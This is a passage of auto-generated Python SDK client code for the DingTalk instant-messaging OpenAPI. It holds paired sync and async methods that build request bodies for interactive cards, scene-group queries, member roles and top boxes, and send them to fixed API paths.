body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupPermissionResponse(),
await self.do_roarequest_async('UpdateGroupPermission', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/permissions', 'json', req, runtime)
)
def send_interactive_card(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendInteractiveCardHeaders()
return self.send_interactive_card_with_options(request, headers, runtime)
async def send_interactive_card_async(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendInteractiveCardHeaders()
return await self.send_interactive_card_with_options_async(request, headers, runtime)
def send_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.at_open_ids):
body['atOpenIds'] = request.at_open_ids
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendInteractiveCardResponse(),
self.do_roarequest('SendInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/send', 'json', req, runtime)
)
async def send_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.at_open_ids):
body['atOpenIds'] = request.at_open_ids
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendInteractiveCardResponse(),
await self.do_roarequest_async('SendInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/send', 'json', req, runtime)
)
def get_scene_group_info(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupInfoHeaders()
return self.get_scene_group_info_with_options(request, headers, runtime)
async def get_scene_group_info_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupInfoHeaders()
return await self.get_scene_group_info_with_options_async(request, headers, runtime)
def get_scene_group_info_with_options(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
headers: dingtalkim__1__0_models.GetSceneGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupInfoResponse(),
self.do_roarequest('GetSceneGroupInfo', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/query', 'json', req, runtime)
)
async def get_scene_group_info_with_options_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
headers: dingtalkim__1__0_models.GetSceneGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupInfoResponse(),
await self.do_roarequest_async('GetSceneGroupInfo', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/query', 'json', req, runtime)
)
def interactive_card_create_instance(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders()
return self.interactive_card_create_instance_with_options(request, headers, runtime)
async def interactive_card_create_instance_async(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders()
return await self.interactive_card_create_instance_with_options_async(request, headers, runtime)
def interactive_card_create_instance_with_options(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
headers: dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse(),
self.do_roarequest('InteractiveCardCreateInstance', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/instances', 'json', req, runtime)
)
async def interactive_card_create_instance_with_options_async(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
headers: dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse(),
await self.do_roarequest_async('InteractiveCardCreateInstance', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/instances', 'json', req, runtime)
)
def topbox_open(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxOpenHeaders()
return self.topbox_open_with_options(request, headers, runtime)
async def topbox_open_async(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxOpenHeaders()
return await self.topbox_open_with_options_async(request, headers, runtime)
def topbox_open_with_options(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
headers: dingtalkim__1__0_models.TopboxOpenHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.expired_time):
body['expiredTime'] = request.expired_time
if not UtilClient.is_unset(request.platforms):
body['platforms'] = request.platforms
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxOpenResponse(),
self.do_roarequest('TopboxOpen', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/open', 'none', req, runtime)
)
async def topbox_open_with_options_async(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
headers: dingtalkim__1__0_models.TopboxOpenHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.expired_time):
body['expiredTime'] = request.expired_time
if not UtilClient.is_unset(request.platforms):
body['platforms'] = request.platforms
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxOpenResponse(),
await self.do_roarequest_async('TopboxOpen', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/open', 'none', req, runtime)
)
def get_scene_group_members(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupMembersHeaders()
return self.get_scene_group_members_with_options(request, headers, runtime)
async def get_scene_group_members_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupMembersHeaders()
return await self.get_scene_group_members_with_options_async(request, headers, runtime)
def get_scene_group_members_with_options(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
headers: dingtalkim__1__0_models.GetSceneGroupMembersHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.size):
body['size'] = request.size
if not UtilClient.is_unset(request.cursor):
body['cursor'] = request.cursor
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupMembersResponse(),
self.do_roarequest('GetSceneGroupMembers', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/members/query', 'json', req, runtime)
)
async def get_scene_group_members_with_options_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
headers: dingtalkim__1__0_models.GetSceneGroupMembersHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.size):
body['size'] = request.size
if not UtilClient.is_unset(request.cursor):
body['cursor'] = request.cursor
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupMembersResponse(),
await self.do_roarequest_async('GetSceneGroupMembers', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/members/query', 'json', req, runtime)
)
def update_the_group_roles_of_group_member(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders()
return self.update_the_group_roles_of_group_member_with_options(request, headers, runtime)
async def update_the_group_roles_of_group_member_async(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders()
return await self.update_the_group_roles_of_group_member_with_options_async(request, headers, runtime)
def update_the_group_roles_of_group_member_with_options(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
headers: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.open_role_ids):
body['openRoleIds'] = request.open_role_ids
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse(),
self.do_roarequest('UpdateTheGroupRolesOfGroupMember', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupRoles', 'json', req, runtime)
)
async def update_the_group_roles_of_group_member_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
headers: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.open_role_ids):
body['openRoleIds'] = request.open_role_ids
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse(),
await self.do_roarequest_async('UpdateTheGroupRolesOfGroupMember', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupRoles', 'json', req, runtime)
)
def send_robot_interactive_card(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendRobotInteractiveCardHeaders()
return self.send_robot_interactive_card_with_options(request, headers, runtime)
async def send_robot_interactive_card_async(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendRobotInteractiveCardHeaders()
return await self.send_robot_interactive_card_with_options_async(request, headers, runtime)
def send_robot_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendRobotInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.request_id):
body['RequestId'] = request.request_id
if not UtilClient.is_unset(request.ding_access_token_type):
body['dingAccessTokenType'] = request.ding_access_token_type
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_open_app_id):
body['dingOpenAppId'] = request.ding_open_app_id
if not UtilClient.is_unset(request.ding_uid):
body['dingUid'] = request.ding_uid
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.card_biz_id):
body['cardBizId'] = request.card_biz_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
